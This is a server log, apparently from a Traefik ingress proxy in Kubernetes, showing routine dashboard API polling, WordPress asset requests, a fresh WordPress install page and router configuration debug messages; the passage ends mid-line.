[30/Mar/2024:07:44:45 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 731 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:44:50 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 732 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:44:50 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 733 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:44:55 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 734 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:44:55 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 735 "api@internal" "-" 0ms +time="2024-03-30T07:44:55Z" level=debug msg="http: TLS handshake error from 10.2.0.129:38064: remote error: tls: unknown certificate" +time="2024-03-30T07:44:59Z" level=debug msg="http: TLS handshake error from 10.0.0.4:34169: remote error: tls: unknown certificate" +10.2.1.1 - - [30/Mar/2024:07:45:00 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 736 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:45:00 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 737 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:45:00 +0000] "GET / HTTP/2.0" 404 19 "-" "-" 738 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:45:00 +0000] "GET /favicon.ico HTTP/2.0" 404 19 "-" "-" 739 "-" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:45:05 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 740 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:45:05 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 741 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:45:10 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 742 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:45:10 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 743 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:45:15 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 744 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:45:15 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 745 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:45:18 +0000] "GET / HTTP/1.1" 200 14510 "-" "-" 746 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 195ms +10.2.1.1 - - [30/Mar/2024:07:45:19 +0000] "GET /wp-includes/blocks/navigation/style.min.css?ver=6.4.3 HTTP/1.1" 200 2276 "-" "-" 747 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 3ms +10.0.0.4 - - [30/Mar/2024:07:45:19 +0000] "GET /wp-includes/blocks/image/style.min.css?ver=6.4.3 HTTP/1.1" 200 1592 "-" "-" 748 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 2ms +10.0.0.4 - - [30/Mar/2024:07:45:19 +0000] "GET /wp-content/themes/twentytwentyfour/assets/images/tourist-and-building.webp HTTP/1.1" 200 66482 "-" "-" 750 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 4ms +10.2.1.1 - - [30/Mar/2024:07:45:19 +0000] "GET /wp-content/themes/twentytwentyfour/assets/images/windows.webp HTTP/1.1" 200 126244 "-" "-" 751 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 4ms +10.2.0.129 - - [30/Mar/2024:07:45:19 +0000] "GET /wp-content/themes/twentytwentyfour/assets/images/building-exterior.webp HTTP/1.1" 200 199724 "-" "-" 749 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 9ms +10.2.1.1 - - [30/Mar/2024:07:45:19 +0000] "GET /wp-includes/js/dist/interactivity.min.js?ver=6.4.3 HTTP/1.1" 200 12030 "-" "-" 752 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 3ms +10.2.0.129 - - [30/Mar/2024:07:45:19 +0000] "GET /wp-includes/blocks/navigation/view.min.js?ver=e3d6f3216904b5b42831 HTTP/1.1" 200 1110 "-" "-" 753 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 3ms +10.0.0.4 - - [30/Mar/2024:07:45:19 +0000] "GET /wp-content/themes/twentytwentyfour/assets/fonts/inter/Inter-VariableFont_slnt,wght.woff2 HTTP/1.1" 200 326628 "-" "-" 754 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 6ms +10.2.1.1 - - [30/Mar/2024:07:45:19 +0000] "GET /wp-content/themes/twentytwentyfour/assets/fonts/cardo/cardo_normal_400.woff2 HTTP/1.1" 200 146060 "-" "-" 755 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 5ms +10.2.0.129 - - [30/Mar/2024:07:45:19 +0000] "GET /wp-content/themes/twentytwentyfour/assets/fonts/cardo/cardo_italic_400.woff2 HTTP/1.1" 200 105184 "-" "-" 756 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 4ms +10.2.0.129 - - [30/Mar/2024:07:45:20 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 757 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:45:20 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 758 "api@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:45:20 +0000] "GET /favicon.ico HTTP/1.1" 301 0 "-" "-" 759 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 31ms +10.0.0.4 - - [30/Mar/2024:07:45:21 +0000] "GET /favicon.ico/ HTTP/1.1" 200 14510 "-" "-" 760 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.1.35:80" 74ms +10.2.1.1 - - [30/Mar/2024:07:45:25 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 761 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:45:25 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 762 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:45:30 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 763 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:45:30 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 764 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:45:35 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 765 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:45:35 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 766 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:45:40 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 767 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:45:40 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 768 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:45:45 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 769 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:45:45 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 770 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:45:50 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 771 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:45:50 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 772 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:45:55 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 773 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:45:55 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 774 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:46:00 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 775 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:46:00 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 776 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:46:05 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 777 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:46:05 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 778 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:46:10 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 779 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:46:10 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 780 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:46:15 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 781 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:46:15 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 782 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:46:20 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 783 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:46:20 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 784 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:46:25 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 785 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:46:25 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 786 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:46:30 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 787 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:46:30 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 788 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:46:35 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 789 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:46:35 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 790 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:46:40 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 791 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:46:40 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 792 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:46:45 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 793 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:46:45 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 794 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:46:50 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 795 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:46:50 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 796 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:46:55 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 797 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:46:55 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 798 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:47:00 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 799 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:47:00 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 800 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:47:05 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 801 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:47:05 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 802 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:47:10 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 803 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:47:10 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 804 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:47:15 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 805 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:47:15 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 806 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:47:20 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 807 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:47:20 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 808 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:47:25 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 809 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:47:25 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 810 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:47:30 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 811 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:47:30 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 812 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:47:35 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 813 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:47:35 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 814 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:47:40 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 815 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:47:40 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 816 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:47:45 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 817 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:47:45 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 818 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:47:50 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 819 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:47:50 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 820 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:47:55 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 821 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:47:55 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 822 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:48:00 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 823 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:48:00 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 824 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:48:05 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 825 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:48:05 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 826 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:48:10 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 827 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:48:10 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 828 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:48:15 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 829 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:48:15 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 830 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:48:20 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 831 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:48:20 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 832 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:48:25 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 833 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:48:25 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 834 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:48:30 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 835 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:48:30 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 836 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:48:35 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 837 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:48:35 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 838 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:48:40 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 839 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:48:40 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 840 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:48:45 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 841 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:48:45 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 842 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:48:50 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 843 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:48:50 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 844 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:48:55 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 845 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:48:55 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 846 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:49:00 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 847 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:49:00 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 848 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:49:05 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 849 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:49:05 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 850 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:49:10 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 851 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:49:10 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 852 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:49:15 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 853 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:49:15 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 854 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:49:20 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 855 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:49:20 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 856 "api@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:50:20 +0000] "GET /api/overview HTTP/1.1" 200 496 "-" "-" 857 "api@internal" "-" 0ms +10.2.1.1 - - [30/Mar/2024:07:50:20 +0000] "GET /api/http/routers?search=&status=&per_page=10&page=1 HTTP/1.1" 200 704 "-" "-" 858 "api@internal" "-" 0ms +time="2024-03-30T07:50:43Z" level=debug msg="Skipping Kubernetes event kind *v1.Endpoints" providerName=kubernetes +time="2024-03-30T07:50:43Z" level=error msg="Skipping service: no endpoints found" serviceName=wp providerName=kubernetes ingress=wp namespace=akashop servicePort="&ServiceBackendPort{Name:,Number:80,}" +time="2024-03-30T07:50:43Z" level=debug msg="Configuration received: {\"http\":{},\"tcp\":{},\"udp\":{}}" providerName=kubernetes +time="2024-03-30T07:50:43Z" level=debug msg="Adding certificate for domain(s) whoami.172.233.168.9.nip.io" +time="2024-03-30T07:50:43Z" level=debug msg="No default certificate, fallback to the internal generated certificate" tlsStoreName=default +time="2024-03-30T07:50:43Z" level=debug msg="Added outgoing tracing middleware dashboard@internal" middlewareName=tracing middlewareType=TracingForwarder entryPointName=traefik routerName=dashboard@internal +time="2024-03-30T07:50:43Z" level=debug msg="Creating middleware" entryPointName=traefik routerName=dashboard@internal middlewareName=dashboard_stripprefix@internal middlewareType=StripPrefix +time="2024-03-30T07:50:43Z" level=debug msg="Adding tracing to middleware" middlewareName=dashboard_stripprefix@internal entryPointName=traefik routerName=dashboard@internal +time="2024-03-30T07:50:43Z" level=debug msg="Creating middleware" middlewareType=RedirectRegex routerName=dashboard@internal entryPointName=traefik middlewareName=dashboard_redirect@internal +time="2024-03-30T07:50:43Z" level=debug msg="Setting up redirection from ^(http:\\/\\/(\\[[\\w:.]+\\]|[\\w\\._-]+)(:\\d+)?)\\/$ to ${1}/dashboard/" entryPointName=traefik middlewareName=dashboard_redirect@internal middlewareType=RedirectRegex routerName=dashboard@internal +time="2024-03-30T07:50:43Z" level=debug msg="Adding tracing to middleware" middlewareName=dashboard_redirect@internal entryPointName=traefik routerName=dashboard@internal +time="2024-03-30T07:50:43Z" level=debug msg="Added outgoing tracing middleware api@internal" entryPointName=traefik routerName=api@internal middlewareName=tracing middlewareType=TracingForwarder +time="2024-03-30T07:50:43Z" level=debug msg="Creating middleware" middlewareName=traefik-internal-recovery middlewareType=Recovery entryPointName=traefik +10.2.1.1 - - [30/Mar/2024:07:50:45 +0000] "GET / HTTP/1.1" 301 17 "-" "-" 859 "dashboard@internal" "-" 0ms +time="2024-03-30T07:50:55Z" level=debug msg="Configuration received: {\"http\":{\"routers\":{\"akashop-wp-whoami-172-233-168-9-nip-io\":{\"entryPoints\":[\"web\"],\"service\":\"akashop-wp-80\",\"rule\":\"Host(`whoami.172.233.168.9.nip.io`) \\u0026\\u0026 PathPrefix(`/`)\"}},\"services\":{\"akashop-wp-80\":{\"loadBalancer\":{\"servers\":[{\"url\":\"http://10.2.0.39:80\"}],\"passHostHeader\":true}}}},\"tcp\":{},\"udp\":{}}" providerName=kubernetes +time="2024-03-30T07:50:55Z" level=debug msg="Adding certificate for domain(s) whoami.172.233.168.9.nip.io" +time="2024-03-30T07:50:55Z" level=debug msg="No default certificate, fallback to the internal generated certificate" tlsStoreName=default +time="2024-03-30T07:50:55Z" level=debug msg="Added outgoing tracing middleware api@internal" entryPointName=traefik middlewareName=tracing middlewareType=TracingForwarder routerName=api@internal +time="2024-03-30T07:50:55Z" level=debug msg="Added outgoing tracing middleware dashboard@internal" routerName=dashboard@internal middlewareName=tracing middlewareType=TracingForwarder entryPointName=traefik +time="2024-03-30T07:50:55Z" level=debug msg="Creating middleware" routerName=dashboard@internal entryPointName=traefik middlewareName=dashboard_stripprefix@internal middlewareType=StripPrefix +time="2024-03-30T07:50:55Z" level=debug msg="Adding tracing to middleware" entryPointName=traefik routerName=dashboard@internal middlewareName=dashboard_stripprefix@internal +time="2024-03-30T07:50:55Z" level=debug msg="Creating middleware" routerName=dashboard@internal middlewareName=dashboard_redirect@internal middlewareType=RedirectRegex entryPointName=traefik +time="2024-03-30T07:50:55Z" level=debug msg="Setting up redirection from ^(http:\\/\\/(\\[[\\w:.]+\\]|[\\w\\._-]+)(:\\d+)?)\\/$ to ${1}/dashboard/" middlewareType=RedirectRegex entryPointName=traefik routerName=dashboard@internal middlewareName=dashboard_redirect@internal +time="2024-03-30T07:50:55Z" level=debug msg="Adding tracing to middleware" middlewareName=dashboard_redirect@internal entryPointName=traefik routerName=dashboard@internal +time="2024-03-30T07:50:55Z" level=debug msg="Creating middleware" middlewareName=traefik-internal-recovery middlewareType=Recovery entryPointName=traefik +time="2024-03-30T07:50:55Z" level=debug msg="Creating middleware" serviceName=akashop-wp-80 middlewareName=pipelining middlewareType=Pipelining entryPointName=web routerName=akashop-wp-whoami-172-233-168-9-nip-io@kubernetes +time="2024-03-30T07:50:55Z" level=debug msg="Creating load-balancer" entryPointName=web routerName=akashop-wp-whoami-172-233-168-9-nip-io@kubernetes serviceName=akashop-wp-80 +time="2024-03-30T07:50:55Z" level=debug msg="Creating server 0 http://10.2.0.39:80" routerName=akashop-wp-whoami-172-233-168-9-nip-io@kubernetes serviceName=akashop-wp-80 entryPointName=web serverName=0 +time="2024-03-30T07:50:55Z" level=debug msg="child http://10.2.0.39:80 now UP" +time="2024-03-30T07:50:55Z" level=debug msg="Propagating new UP status" +time="2024-03-30T07:50:55Z" level=debug msg="Added outgoing tracing middleware akashop-wp-80" entryPointName=web routerName=akashop-wp-whoami-172-233-168-9-nip-io@kubernetes middlewareName=tracing middlewareType=TracingForwarder +time="2024-03-30T07:50:55Z" level=debug msg="Creating middleware" entryPointName=web middlewareType=Recovery middlewareName=traefik-internal-recovery +time="2024-03-30T07:50:55Z" level=debug msg="Skipping Kubernetes event kind *v1.Endpoints" providerName=kubernetes +10.2.0.129 - - [30/Mar/2024:07:51:03 +0000] "GET / HTTP/1.1" 301 17 "-" "-" 860 "dashboard@internal" "-" 0ms +10.2.0.129 - - [30/Mar/2024:07:51:03 +0000] "GET /dashboard/ HTTP/1.1" 200 1163 "-" "-" 861 "dashboard@internal" "-" 0ms +10.0.0.4 - - [30/Mar/2024:07:51:09 +0000] "GET / HTTP/1.1" 302 0 "-" "-" 862 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.0.39:80" 135ms +10.0.0.4 - - [30/Mar/2024:07:51:10 +0000] "GET /wp-admin/install.php HTTP/1.1" 200 2386 "-" "-" 863 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.0.39:80" 884ms +10.2.1.1 - - [30/Mar/2024:07:51:11 +0000] "GET /wp-includes/css/buttons.min.css?ver=6.4.3 HTTP/1.1" 200 1472 "-" "-" 866 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.0.39:80" 3ms +10.2.0.129 - - [30/Mar/2024:07:51:11 +0000] "GET /wp-admin/css/l10n.min.css?ver=6.4.3 HTTP/1.1" 200 686 "-" "-" 864 "akashop-wp-whoami-172-233-168-9-nip-io@kubernetes" "http://10.2.0.39:80" 5ms +10.0.0.4 - - [30/Mar/2024:07:51:11 +0000] "GET 